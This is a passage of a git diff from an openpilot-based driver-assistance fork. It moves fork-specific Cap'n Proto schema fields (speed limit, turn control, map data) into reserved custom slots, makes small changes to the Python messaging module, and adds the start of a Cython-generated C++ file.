::capnp::_::PointerHelpers< ::cereal::LiveMapData>::init(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void Event::Builder::adoptLiveMapData( - ::capnp::Orphan< ::cereal::LiveMapData>&& value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LIVE_MAP_DATA); - ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::adopt(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::cereal::LiveMapData> Event::Builder::disownLiveMapData() { - KJ_IREQUIRE((which() == Event::LIVE_MAP_DATA), - "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::disown(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} - } // namespace diff --git a/cereal/libcereal_shared.so b/cereal/libcereal_shared.so index 36cb5edd1..8012fd9ed 100755 Binary files a/cereal/libcereal_shared.so and b/cereal/libcereal_shared.so differ diff --git a/cereal/log.capnp b/cereal/log.capnp index b8eb4ad0e..e958b084f 100644 --- a/cereal/log.capnp +++ b/cereal/log.capnp @@ -4,7 +4,6 @@ $Cxx.namespace("cereal"); using Car = import "car.capnp"; using Legacy = import "legacy.capnp"; using Custom = import "custom.capnp"; -using Dp = import "dp.capnp"; @0xf3b1f17e25a4285b; @@ -441,8 +440,6 @@ struct PandaState @0xa7649e2575e4591e { safetyParam @27 :UInt16; alternativeExperience @23 :Int16; safetyRxChecksInvalid @32 :Bool; - #dp: enable torque interceptor - torqueInterceptorDetected @37 :Bool; voltage @0 :UInt32; current @1 :UInt32; @@ -682,9 +679,6 @@ struct ControlsState @0x97ff69c53601abf1 { cumLagMs @15 :Float32; canErrorCounter @57 :UInt32; - # dp - for alt lateral - dpLateralAltActive @66 :Bool; - lateralControlState :union { indiState @52 :LateralINDIState; pidState @53 :LateralPIDState; @@ -693,8 +687,7 @@ struct ControlsState @0x97ff69c53601abf1 { torqueState @60 :LateralTorqueState; curvatureState @65 :LateralCurvatureState; - #dp - lqrState @55 :LateralLQRState; + lqrStateDEPRECATED @55 :LateralLQRState; } enum OpenpilotState @0xdbe58b96d2d1ac61 { @@ -876,6 +869,7 @@ struct ModelDataV2 { temporalPose @21 :Pose; navEnabled @22 :Bool; + locationMonoTime @24 :UInt64; struct LeadDataV2 { @@ -996,8 +990,7 @@ struct LongitudinalPlan @0xe00b5b3eba12876c { longitudinalPlanSource @15 :LongitudinalPlanSource; processingDelay @29 :Float32; - # desired distances/speed/accel/jerk over next 2.5s - distances @51 :List(Float32); + # desired speed/accel/jerk over next 2.5s accels @32 :List(Float32); speeds @33 :List(Float32); jerks @34 :List(Float32); @@ -1005,34 +998,12 @@ struct LongitudinalPlan @0xe00b5b3eba12876c { solverExecutionTime @35 :Float32; personality @36 :LongitudinalPersonality; - #dp - visionTurnControllerState @37 :VisionTurnControllerState; - visionTurnSpeed @38 :Float32; - speedLimitControlState @39 :SpeedLimitControlState; - speedLimit @40 :Float32; - speedLimitOffset @41 :Float32; - distToSpeedLimit @42 :Float32; - isMapSpeedLimit @43 :Bool; - speedLimitPercOffset @44 :Bool; - speedLimitValueOffset @45 :Float32; - - distToTurn @46 :Float32; - turnSpeed @47 :Float32; - turnSpeedControlState @48 :SpeedLimitControlState; - turnSign @49 :Int16; - - dpE2EIsBlended @50 :Bool; - enum LongitudinalPlanSource { cruise @0; lead0 @1; lead1 @2; lead2 @3; e2e @4; - #dp - turn @5; - limit @6; - turnlimit @7; } # deprecated @@ -1068,21 +1039,6 @@ struct LongitudinalPlan @0xe00b5b3eba12876c { x @0 :List(Float32); y @1 :List(Float32); } - - #dp - enum SpeedLimitControlState { - inactive @0; # No speed limit set or not enabled by parameter. - tempInactive @1; # User wants to ignore speed limit until it changes. - adapting @2; # Reducing speed to match new speed limit. - active @3; # Cruising at speed limit. - } - - enum VisionTurnControllerState { - disabled @0; # No predicted substantial turn on vision range or feature disabled. - entering @1; # A substantial turn is predicted ahead, adapting speed to turn comfort levels. - turning @2; # Actively turning. Managing acceleration to provide a roll on turn feeling. - leaving @3; # Road ahead straightens. Start to allow positive acceleration. - } } struct UiPlan { frameId @2 :UInt32; @@ -1098,10 +1054,6 @@ struct LateralPlan @0xe1e9318e2ae8b51e { dPathPoints @20 :List(Float32); dProbDEPRECATED @21 :Float32; - #dp - dPathWLinesX @34 :List(Float32); - dPathWLinesY @35 :List(Float32); - mpcSolutionValid @9 :Bool; desire @17 :Desire; laneChangeState @18 :LaneChangeState; @@ -2074,29 +2026,6 @@ struct CameraOdometry { roadTransformTransStd @9 :List(Float32); } -struct LiveMapData { - speedLimitValid @0 :Bool; - speedLimit @1 :Float32; - speedLimitAheadValid @2 :Bool; - speedLimitAhead @3 :Float32; - speedLimitAheadDistance @4 :Float32; - turnSpeedLimitValid @5 :Bool; - turnSpeedLimit @6 :Float32; - turnSpeedLimitEndDistance @7 :Float32; - turnSpeedLimitSign @8 :Int16; - turnSpeedLimitsAhead @9 :List(Float32); - turnSpeedLimitsAheadDistances @10 :List(Float32); - turnSpeedLimitsAheadSigns @11 :List(Int16); - lastGpsTimestamp @12 :Int64; # Milliseconds since January 1, 1970. - currentRoadName @13 :Text; - lastGpsLatitude @14 :Float64; - lastGpsLongitude @15 :Float64; - lastGpsSpeed @16 :Float32; - lastGpsBearingDeg @17 :Float32; - lastGpsAccuracy @18 :Float32; - lastGpsBearingAccuracyDeg @19 :Float32; -} - struct Sentinel { enum SentinelType { endOfSegment @0; @@ -2189,6 +2118,7 @@ struct MapRenderState { struct NavModelData { frameId @0 :UInt32; + locationMonoTime @6 :UInt64; modelExecutionTime @1 :Float32; dspExecutionTime @2 :Float32; features @3 :List(Float32); @@ -2311,7 +2241,7 @@ struct Event { # UI services userFlag @93 :UserFlag; uiDebug @102 :UIDebug; - # dp reserve 107,108 + # *********** debug *********** testJoystick @52 :Joystick; roadEncodeData @86 :EncodeData; @@ -2324,9 +2254,9 @@ struct Event { livestreamDriverEncodeData @122 :EncodeData; # *********** Custom: reserved for forks *********** - customReserved0 @107 :Custom.CustomReserved0; - customReserved1 @108 :Custom.CustomReserved1; - customReserved2 @109 :Custom.CustomReserved2; + liveMapData @107 :Custom.LiveMapData; + longitudinalPlanExt @108 :Custom.LongitudinalPlanExt; + lateralPlanExt @109 :Custom.LateralPlanExt; customReserved3 @110 :Custom.CustomReserved3; customReserved4 @111 :Custom.CustomReserved4; customReserved5 @112 :Custom.CustomReserved5; @@ -2335,10 +2265,6 @@ struct Event { customReserved8 @115 :Custom.CustomReserved8; customReserved9 @116 :Custom.CustomReserved9; - #dp - dragonConf @123 :Dp.DragonConf; - liveMapData @124 :LiveMapData; - # *********** legacy + deprecated *********** model @9 :Legacy.ModelData; # TODO: rename modelV2 and mark this as deprecated liveMpcDEPRECATED @36 :LiveMpcData; diff --git a/cereal/messaging/__init__.py b/cereal/messaging/__init__.py index 60b4934b6..5a863f130 100644 --- a/cereal/messaging/__init__.py +++ b/cereal/messaging/__init__.py @@ -1,8 +1,10 @@ -# must be build with scons +# must be built with scons from .messaging_pyx import Context, Poller, SubSocket, PubSocket, SocketEventHandle, toggle_fake_events, set_fake_prefix, get_fake_prefix, delete_fake_prefix, wait_for_one_event # pylint: disable=no-name-in-module, import-error from .messaging_pyx import MultiplePublishersError, MessagingError # pylint: disable=no-name-in-module, import-error + import os import capnp +import time from typing import Optional, List, Union, Dict, Deque from collections import deque @@ -20,13 +22,11 @@ assert wait_for_one_event NO_TRAVERSAL_LIMIT = 2**64-1 AVG_FREQ_HISTORY = 100 -SIMULATION = "SIMULATION" in os.environ # sec_since_boot is faster, but allow to run standalone too try: from common.realtime import sec_since_boot except ImportError: - import time sec_since_boot = time.time print("Warning, using python time.time() instead of faster sec_since_boot") @@ -43,7 +43,8 @@ def fake_event_handle(endpoint: str, identifier: Optional[str] = None, override: def log_from_bytes(dat: bytes) -> capnp.lib.capnp._DynamicStructReader: - return log.Event.from_bytes(dat, traversal_limit_in_words=NO_TRAVERSAL_LIMIT) + with log.Event.from_bytes(dat, traversal_limit_in_words=NO_TRAVERSAL_LIMIT) as msg: + return msg def new_message(service: Optional[str] = None, size: Optional[int] = None) -> capnp.lib.capnp._DynamicStructBuilder: @@ -179,6 +180,7 @@ class SubMaster: self.ignore_average_freq = [] if ignore_avg_freq is None else ignore_avg_freq self.ignore_alive = [] if ignore_alive is None else ignore_alive + self.simulation = bool(int(os.getenv("SIMULATION", "0"))) for s in services: if addr is not None: @@ -231,11 +233,11 @@ class SubMaster: self.logMonoTime[s] = msg.logMonoTime self.valid[s] = msg.valid - if SIMULATION: + if self.simulation: self.freq_ok[s] = True self.alive[s] = True - if not SIMULATION: + if not self.simulation: for s in self.data: # arbitrary small number to avoid float comparison. If freq is 0, we can skip the check if self.freq[s] > 1e-5: @@ -291,5 +293,13 @@ class PubMaster: dat = dat.to_bytes() self.sock[s].send(dat) + def wait_for_readers_to_update(self, s: str, timeout: int) -> bool: + dt = 0.05 + for _ in range(int(timeout*(1./dt))): + if self.sock[s].all_readers_updated(): + return True + time.sleep(dt) + return False + def all_readers_updated(self, s: str) -> bool: return self.sock[s].all_readers_updated() # type: ignore diff --git a/cereal/messaging/bridge b/cereal/messaging/bridge index 118a81e10..6769c9c19 100755 Binary files a/cereal/messaging/bridge and b/cereal/messaging/bridge differ diff --git a/cereal/messaging/messaging_pyx.cpp b/cereal/messaging/messaging_pyx.cpp new file mode 100644 index 000000000..6b1227feb --- /dev/null +++ b/cereal/messaging/messaging_pyx.cpp @@ -0,0 +1,16441 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "cereal/messaging/impl_fake.h", + "cereal/messaging/messaging.h" + ], + "language": "c++", + "name": "cereal.messaging.messaging_pyx", + "sources": [ + "/data/openpilot/cereal/messaging/messaging_pyx.pyx" + ] + }, + "module_name": "cereal.messaging.messaging_pyx" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] 